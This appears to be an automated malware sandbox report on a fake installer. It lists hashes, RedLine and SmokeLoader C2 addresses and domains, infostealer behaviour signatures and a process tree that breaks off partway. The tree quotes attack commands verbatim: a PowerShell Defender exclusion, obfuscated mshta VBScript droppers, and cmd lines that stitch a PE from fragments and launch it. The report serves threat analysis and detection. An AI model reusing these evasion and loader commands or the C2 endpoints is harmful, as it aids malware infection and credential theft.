Resubmissions

13-10-2021 18:35

211013-w8lxmaegdr 10

13-10-2021 12:38

211013-pvkdbadhdm 10

13-10-2021 05:30

211013-f7nrtsdfa3 10

12-10-2021 20:25

211012-y7qwasdbh4 10

11-10-2021 21:02

211011-zvywtaabdq 10

Analysis

  • max time kernel
    1812s
  • max time network
    1819s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    13-10-2021 05:30

General

  • Target

    setup_x86_x64_install.exe

  • Size

    3.4MB

  • MD5

    26f28bf2dc2b6afc0dd99cb6ea3879b8

  • SHA1

    9270b9f48e2d14cc2cbed61ee2e2389d5f69ce05

  • SHA256

    5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa

  • SHA512

    5a350373e87673c9ba39e5353bea1d7c1f2f7bc62a703ed13e892e69037008f3e2accadbdd0ec0bd976e54c68b79dfad6fb37517dd55448cac4d9d74ae8a037b

Malware Config

Extracted

Family

redline

Botnet

media12

C2

91.121.67.60:2151

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

smokeloader

Version

2020

C2

http://linavanandr11.club/

http://iselaharty12.club/

http://giovaninardo13.club/

http://zayneliann14.club/

http://zorinosali15.club/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 20 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • UAC bypass 3 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Sets service image path in registry 2 TTPs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 32 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 17 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 33 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 30 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 20 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 43 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 5 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
  • Suspicious behavior: SetClipboardViewer 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\sihclient.exe
    C:\Windows\System32\sihclient.exe /cv 1PsfHjy/6UuX87LF/E3WAg.0.2
    1⤵
    • Modifies data under HKEY_USERS
    PID:4172
  • C:\Windows\System32\Upfc.exe
    C:\Windows\System32\Upfc.exe /launchtype periodic /cv c4QZvIvDlEangE8xJGiw+w.0
    1⤵
      PID:4808
      • C:\Windows\System32\sihclient.exe
        C:\Windows\System32\sihclient.exe /cv c4QZvIvDlEangE8xJGiw+w.0.2
        2⤵
          PID:5300
      • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:4852
        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1108
          • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\setup_install.exe
            "C:\Users\Admin\AppData\Local\Temp\7zS454469E3\setup_install.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1896
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1300
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1524
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1464
              • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20762bc3f6.exe
                Mon20762bc3f6.exe
                5⤵
                • Executes dropped EXE
                PID:3440
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1356
              • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon206b909958ed4.exe
                Mon206b909958ed4.exe /mixone
                5⤵
                • Executes dropped EXE
                PID:2912
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 284
                  6⤵
                  • Program crash
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5356
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4900
              • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20927aab1e5.exe
                Mon20927aab1e5.exe
                5⤵
                • Executes dropped EXE
                PID:1668
                • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20927aab1e5.exe
                  C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20927aab1e5.exe
                  6⤵
                  • Executes dropped EXE
                  PID:2896
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1904
              • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe
                Mon203f01ac7e6.exe
                5⤵
                • Executes dropped EXE
                PID:2992
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  6⤵
                    PID:3980
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe" ) do taskkill /F -Im "%~NxU"
                      7⤵
                        PID:436
                        • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                          09xU.EXE -pPtzyIkqLZoCarb5ew
                          8⤵
                          • Executes dropped EXE
                          PID:3720
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                            9⤵
                              PID:4036
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                10⤵
                                  PID:2044
                              • C:\Windows\SysWOW64\mshta.exe
                                "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                9⤵
                                • Suspicious use of SetThreadContext
                                PID:1668
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                  10⤵
                                    PID:504
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                      11⤵
                                        PID:5496
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                        11⤵
                                          PID:4244
                                        • C:\Windows\SysWOW64\control.exe
                                          control .\R6f7sE.I
                                          11⤵
                                            PID:5948
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                              12⤵
                                              • Loads dropped DLL
                                              PID:2068
                                              • C:\Windows\system32\RunDll32.exe
                                                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                13⤵
                                                  PID:2944
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                    14⤵
                                                    • Loads dropped DLL
                                                    PID:6064
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /F -Im "Mon203f01ac7e6.exe"
                                        8⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:908
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2940
                                • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon204014f13870f5e.exe
                                  Mon204014f13870f5e.exe
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2200
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 280
                                    6⤵
                                    • Program crash
                                    PID:5396
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Mon209c830507d573.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1720
                                • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon209c830507d573.exe
                                  Mon209c830507d573.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:920
                                  • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon209c830507d573.exe
                                    C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon209c830507d573.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2400
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe
                                4⤵
                                  PID:2740
                                  • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20d3b8b752.exe
                                    Mon20d3b8b752.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:976
                                    • C:\Users\Admin\Pictures\Adobe Films\04JJ3RxmoOrkjUmTE75tZicJ.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\04JJ3RxmoOrkjUmTE75tZicJ.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:5156
                                    • C:\Users\Admin\Pictures\Adobe Films\r0qEA6ZNISqo0Tq09aQk8H2C.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\r0qEA6ZNISqo0Tq09aQk8H2C.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:5528
                                    • C:\Users\Admin\Pictures\Adobe Films\qvgjxjaIyEOYZSsKaNkUA6BG.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\qvgjxjaIyEOYZSsKaNkUA6BG.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:5388
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 280
                                        7⤵
                                        • Program crash
                                        • Checks processor information in registry
                                        • Enumerates system info in registry
                                        PID:5316
                                    • C:\Users\Admin\Pictures\Adobe Films\H86qWBuHzWZmGITuNE3X9SxF.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\H86qWBuHzWZmGITuNE3X9SxF.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2260
                                      • C:\Users\Admin\Pictures\Adobe Films\H86qWBuHzWZmGITuNE3X9SxF.exe
                                        "H86qWBuHzWZmGITuNE3X9SxF.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:3504
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 148
                                          8⤵
                                          • Executes dropped EXE
                                          • Program crash
                                          • Checks processor information in registry
                                          • Enumerates system info in registry
                                          PID:5568
                                    • C:\Users\Admin\Pictures\Adobe Films\rv0IoLjCTiAVqq_ZvgumHf0K.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\rv0IoLjCTiAVqq_ZvgumHf0K.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Accesses Microsoft Outlook accounts
                                      • Accesses Microsoft Outlook profiles
                                      • outlook_office_path
                                      • outlook_win_path
                                      PID:5352
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Pictures\Adobe Films\rv0IoLjCTiAVqq_ZvgumHf0K.exe"
                                        7⤵
                                          PID:504
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /T 10 /NOBREAK
                                            8⤵
                                            • Delays execution with timeout.exe
                                            PID:6240
                                      • C:\Users\Admin\Pictures\Adobe Films\WkcWFH3P8gRGZgykU0ledS3T.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\WkcWFH3P8gRGZgykU0ledS3T.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5652
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5652 -s 1936
                                          7⤵
                                          • Program crash
                                          • Checks processor information in registry
                                          • Enumerates system info in registry
                                          PID:6976
                                      • C:\Users\Admin\Pictures\Adobe Films\kcqx8N9nfA3k0vDFYVlSf29e.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\kcqx8N9nfA3k0vDFYVlSf29e.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:1176
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 276
                                          7⤵
                                          • Program crash
                                          • Checks processor information in registry
                                          • Enumerates system info in registry
                                          PID:7100
                                      • C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks processor information in registry
                                        • Enumerates system info in registry
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5396
                                        • C:\Windows\SysWOW64\mshta.exe
                                          "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )
                                          7⤵
                                            PID:6084
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe" ) do taskkill -iM "%~NXI" -f
                                              8⤵
                                                PID:5180
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill -iM "cYUc7wuTDsuE7h7XbhShNkR8.exe" -f
                                                  9⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:6044
                                                • C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE
                                                  ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02
                                                  9⤵
                                                    PID:2036
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF ""-PMDrnm85Xpfala4uMu02"" == """" for %I iN ( ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )
                                                      10⤵
                                                        PID:5660
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "-PMDrnm85Xpfala4uMu02" == "" for %I iN ( "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ) do taskkill -iM "%~NXI" -f
                                                          11⤵
                                                            PID:6352
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          "C:\Windows\System32\mshta.exe" vBScripT: clOse ( cREaTeObJECT ( "wscRIPt.SHELL" ). rUN ( "cMd /q /R Echo | SeT /P = ""MZ"" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3 + n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l " , 0 , trUE ) )
                                                          10⤵
                                                            PID:5648
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /q /R Echo | SeT /P = "MZ" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3+ n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l
                                                              11⤵
                                                                PID:6300
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>9Ym~JXRX.Lb3"
                                                                  12⤵
                                                                    PID:5284
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /S /D /c" Echo "
                                                                    12⤵
                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                    PID:5908
                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                    msiexec.exe /Y ..\bjUC.l
                                                                    12⤵
                                                                    • Loads dropped DLL
                                                                    PID:7136
                                                      • C:\Users\Admin\Pictures\Adobe Films\H8jw_4TmnGzyEx6PHssgdCoy.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\H8jw_4TmnGzyEx6PHssgdCoy.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:3208
                                                        • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                          C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                          7⤵
                                                          • Loads dropped DLL
                                                          • Adds Run key to start application
                                                          PID:660
                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--oYd2f1"
                                                            8⤵
                                                            • Loads dropped DLL
                                                            PID:6968
                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                              C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff8e63fdec0,0x7ff8e63fded0,0x7ff8e63fdee0
                                                              9⤵
                                                              • Loads dropped DLL
                                                              PID:7032
                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,17034119904828723174,11798907332187844991,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6968_1142275528" --mojo-platform-channel-handle=1888 /prefetch:8
                                                              9⤵
                                                              • Loads dropped DLL
                                                              PID:8256
                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1584,17034119904828723174,11798907332187844991,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6968_1142275528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1600 /prefetch:2
                                                              9⤵
                                                              • Loads dropped DLL
                                                              PID:8220
                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1584,17034119904828723174,11798907332187844991,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6968_1142275528" --mojo-platform-channel-handle=2264 /prefetch:8
                                                              9⤵
                                                              • Loads dropped DLL
                                                              PID:8308
                                                      • C:\Users\Admin\Pictures\Adobe Films\lbbD1Mb94469URLfxW1wrRWT.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\lbbD1Mb94469URLfxW1wrRWT.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Checks BIOS information in registry
                                                        • Checks whether UAC is enabled
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:6000
                                                      • C:\Users\Admin\Pictures\Adobe Films\WzMNlEBCfd7fUc9yVHJGL8mN.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\WzMNlEBCfd7fUc9yVHJGL8mN.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Checks BIOS information in registry
                                                        • Checks whether UAC is enabled
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:4960
                                                      • C:\Users\Admin\Pictures\Adobe Films\sBagaJbRYGdhvlfxFPDGBfzx.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\sBagaJbRYGdhvlfxFPDGBfzx.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Checks BIOS information in registry
                                                        • Checks whether UAC is enabled
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:956
                                                      • C:\Users\Admin\Pictures\Adobe Films\DXiS7jLx9LBM1kEuISf6_JlF.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\DXiS7jLx9LBM1kEuISf6_JlF.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Checks BIOS information in registry
                                                        • Checks whether UAC is enabled
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:4244
                                                      • C:\Users\Admin\Pictures\Adobe Films\F4LLEIXhcwcYCzNp9BKCzYL4.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\F4LLEIXhcwcYCzNp9BKCzYL4.exe"
                                                        6⤵
                                                          PID:4048
                                                          • C:\Users\Admin\Documents\D58TSz1lDcFUah1qLzzPzlja.exe
                                                            "C:\Users\Admin\Documents\D58TSz1lDcFUah1qLzzPzlja.exe"
                                                            7⤵
                                                              PID:5268
                                                              • C:\Users\Admin\Pictures\Adobe Films\mV0TwJYjjETnUWHpQms2tVRR.exe
